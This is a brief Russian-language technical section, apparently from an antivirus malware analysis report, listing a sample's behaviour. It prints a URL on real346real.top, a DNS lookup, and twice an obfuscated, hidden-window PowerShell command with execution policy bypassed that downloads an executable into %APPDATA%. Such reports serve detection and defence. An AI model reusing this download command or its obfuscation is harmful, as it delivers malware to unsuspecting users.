Техническая информация
- http://real346real.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWershell.eXe -eXeCUtiONPoLIcy byPAss -NoprOFIle -WIndoWsTYlE HIDdEN (NEw-ObjECt sySTEM.nEt.wEbCLIENt).DOwnlOAdFIlE('http://real346real.top/search.php','%APpDAtA%.Exe');...
- DNS ASK re###46real.top
- '<SYSTEM32>\cmd.exe' /C "poWershell.eXe -eXeCUtiONPoLIcy byPAss -NoprOFIle -WIndoWsTYlE HIDdEN (NEw-ObjECt sySTEM.nEt.wEbCLIENt).DOwnlOAdFIlE('http://real346real.top/search.php','%APpDAtA%.Exe');...' (со скрытым окном)